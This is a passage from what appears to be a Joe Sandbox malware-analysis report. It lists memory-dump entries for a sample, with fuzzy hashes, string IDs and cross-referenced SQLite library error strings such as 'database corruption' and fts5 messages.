                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                                • API String ID: 0-815501780
                                                                • Opcode ID: c0267b966ab554e456d85110040848accf7a41413a8be754b23d95854c116905
                                                                • Instruction ID: 7d6e3956ef0259aa40feaab727a618ff4a69675604ae6765d1e4d5564865f369
                                                                • Opcode Fuzzy Hash: c0267b966ab554e456d85110040848accf7a41413a8be754b23d95854c116905
                                                                • Instruction Fuzzy Hash: D7319E7A7002159FCB20DF19DC80A6AB3E4EF84665F15856DF989DB301E332E805CBA2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 4a96947b074692edf34c857c5241046a44f685d4ed371db91c5926a210eb71b7
                                                                • Instruction ID: 403aab4731124aa66adeda569f86427931b70a082553a1af779dc4e44ddb6370
                                                                • Opcode Fuzzy Hash: 4a96947b074692edf34c857c5241046a44f685d4ed371db91c5926a210eb71b7
                                                                • Instruction Fuzzy Hash: E831403160836156C714DE1DDC404B5BBE1EBC122AF058A7FF9E5DB2C2D638E554C792
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D78147A
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D78146B
                                                                • database corruption, xrefs: 1D781475
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: c863288f10aed6caada684b8caff4b393b0024fb782bc8157028fd976f188215
                                                                • Instruction ID: 3caa74ce51779301747e3ccdb277a4423166c2878c35ba34487edf67d3834a91
                                                                • Opcode Fuzzy Hash: c863288f10aed6caada684b8caff4b393b0024fb782bc8157028fd976f188215
                                                                • Instruction Fuzzy Hash: 6C31B1B56093918FC310CF29D940967FBF0EF85225F04869EE8CA8BA53D731E549CBA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 46a87333eb9edc334f59b4c9dfd23db63258bb7fe0f1a784e8ae08b23238487a
                                                                • Instruction ID: bfd514c5b8d4fa9a18778624763f4876d3ce8f34814f74a4a8c0ac6c50eea352
                                                                • Opcode Fuzzy Hash: 46a87333eb9edc334f59b4c9dfd23db63258bb7fe0f1a784e8ae08b23238487a
                                                                • Instruction Fuzzy Hash: DB3126712083A18AC722CE18DC805B6FBE1EFC1222B44896FE5A5CB382D234E549C763
                                                                Strings
                                                                • second argument to nth_value must be a positive integer, xrefs: 1D73F0C4
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: second argument to nth_value must be a positive integer
                                                                • API String ID: 0-2620530100
                                                                • Opcode ID: e8d5cb06607be1637894a2f77495e64f9b47f78663a592a3e90c233af6d8731a
                                                                • Instruction ID: 3198f32f83c4d53d896311519cd64070188ae38f5e9813c66725f54ec35d5daf
                                                                • Opcode Fuzzy Hash: e8d5cb06607be1637894a2f77495e64f9b47f78663a592a3e90c233af6d8731a
                                                                • Instruction Fuzzy Hash: 23313977904202BBCB109E18EC41726B3A0BF40772F948555F999A7292E732FD548693
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: rbu(%s)/%z$rbu/zipvfs setup error
                                                                • API String ID: 0-199214844
                                                                • Opcode ID: 8a0aa2e8c53ced69d8c4afa7c8272ea1178db75969312c9b7f4daa292339def2
                                                                • Instruction ID: 3545ee58e9bf562a451a9fb85f83265e20ecc11a95d075e340430b03d2629ee9
                                                                • Opcode Fuzzy Hash: 8a0aa2e8c53ced69d8c4afa7c8272ea1178db75969312c9b7f4daa292339def2
                                                                • Instruction Fuzzy Hash: C721E1B66003069FD710CF19DC81AAAB7E5EBC8230F11447EE95D87211DB32E8048B93
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D775301
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7752F2
                                                                • database corruption, xrefs: 1D7752FC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 89a728de78c3a52381500393089531b703a6a5676c918e15ff7fbeeca46a3d04
                                                                • Instruction ID: 8d1872bb1e6d1403d4949701442349daaafb33e3bc16f393d74d9fc688bcd519
                                                                • Opcode Fuzzy Hash: 89a728de78c3a52381500393089531b703a6a5676c918e15ff7fbeeca46a3d04
                                                                • Instruction Fuzzy Hash: D611D87760421077CB105B5DFC40CEBBB95DFC52B6F0A4566FA4C57122E623E91193A3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D8984D0
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8984C1
                                                                • database corruption, xrefs: 1D8984CB
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 7c66a17251de5190fddd99ddc03ecdd2d42bc93601e60ec9972035c6df92845e
                                                                • Instruction ID: c122501cd48fbc2884e40d1326eaf6ad4dfa07a903d4563d81f46a6186260ab6
                                                                • Opcode Fuzzy Hash: 7c66a17251de5190fddd99ddc03ecdd2d42bc93601e60ec9972035c6df92845e
                                                                • Instruction Fuzzy Hash: 6521B076204B42DBD7208E58DC80BA7B3B4AFC4221F00482EF98A87352E335E9498763
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D77FE82
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77FDE6, 1D77FE61
                                                                • database corruption, xrefs: 1D77FE7D
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 453e7ac76d33d28568255fc73bc47aa371d916039e5f5765117c5ff86502f4fe
                                                                • Instruction ID: 7e7d713f17432a0df3aae8eada40bc1a05894fe722cdf72198211747f17ce722
                                                                • Opcode Fuzzy Hash: 453e7ac76d33d28568255fc73bc47aa371d916039e5f5765117c5ff86502f4fe
                                                                • Instruction Fuzzy Hash: EA3138A81542818AD7158F24C404366BBA1BF15318F64C8DED4498F797E37BC4C7DB97
                                                                Strings
                                                                • misuse, xrefs: 1D73B233
                                                                • %s at line %d of [%.10s], xrefs: 1D73B238
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D73B229
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: a5ac2b79d4a7b3dd04e17c7e2e1abda1d92e3262ed50b554ee8d46e8588cf04e
                                                                • Instruction ID: 3828ace30907e3e2afa76cd3f2eb6d52a6035a24a5717c622d31a360c6007ad2
                                                                • Opcode Fuzzy Hash: a5ac2b79d4a7b3dd04e17c7e2e1abda1d92e3262ed50b554ee8d46e8588cf04e
                                                                • Instruction Fuzzy Hash: B911D875604701BBD701DA28DC84F7F77A9AFC4226F42452DF96997213E730E51487A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s%s
                                                                • API String ID: 0-3252725368
                                                                • Opcode ID: 75fcbeee3588f811bc7ae5dcfbee94016eee0781531ce3654c0718032ebb68a6
                                                                • Instruction ID: 7b62d0545f238496acef2c1cce45fff5db06fbb9d8cf7c83dd7fb9b9c3c70dc8
                                                                • Opcode Fuzzy Hash: 75fcbeee3588f811bc7ae5dcfbee94016eee0781531ce3654c0718032ebb68a6
                                                                • Instruction Fuzzy Hash: 6A118475908220DFD7015B59DCC8B6633B9FF823AAF04026AF908D7216D7359515CBB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: WITHOUT ROWID$CREATE TABLE %Q.'%q_%q'(%s)%s$fts5: error creating shadow table %q_%s: %s
                                                                • API String ID: 0-1971204597
                                                                • Opcode ID: 00f89b1b2ee5c288f88df107030d6a092d94f62ff72a85c0eaf75f7358ce19c8
                                                                • Instruction ID: adb34534612df9ff76bdb4d99ee7f7714bd5982b0f2e6c5a27a3d279e88bba13
                                                                • Opcode Fuzzy Hash: 00f89b1b2ee5c288f88df107030d6a092d94f62ff72a85c0eaf75f7358ce19c8
                                                                • Instruction Fuzzy Hash: 2E119071608210AFDB018F58ECC8B2AB7B8FB8529AF00466DF945DA212D735D414DFA3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D7DA6D2
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7DA6C3
                                                                • database corruption, xrefs: 1D7DA6CD
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 2a7ce817cb18fafaf4bd53a1ba6964742a67b650906208ee2413951e6d8eef08
                                                                • Instruction ID: 7794b7bb2ab3ad12039a689afe7f5fca6f89d30a22e08d381495fb10cbba024c
                                                                • Opcode Fuzzy Hash: 2a7ce817cb18fafaf4bd53a1ba6964742a67b650906208ee2413951e6d8eef08
                                                                • Instruction Fuzzy Hash: 731160B52042019FD700DF59EC80FAB77E9EFD0321F5508AAF6449B261D331A8458B63
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D774E27
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D774E18
                                                                • database corruption, xrefs: 1D774E22
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 964b7b2479aab801dfdf06940e660c2da769371e543c49ad1c29b25f49296d1a
                                                                • Instruction ID: 9321bde8595fdaf9cf1548a7e3e8b2e3e367118c7e25526071ead51fb6e5f5ad
                                                                • Opcode Fuzzy Hash: 964b7b2479aab801dfdf06940e660c2da769371e543c49ad1c29b25f49296d1a
                                                                • Instruction Fuzzy Hash: 91118172605211DFC700DF58D880A9ABBE5EF94769F15449EF1489B222D372E842CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
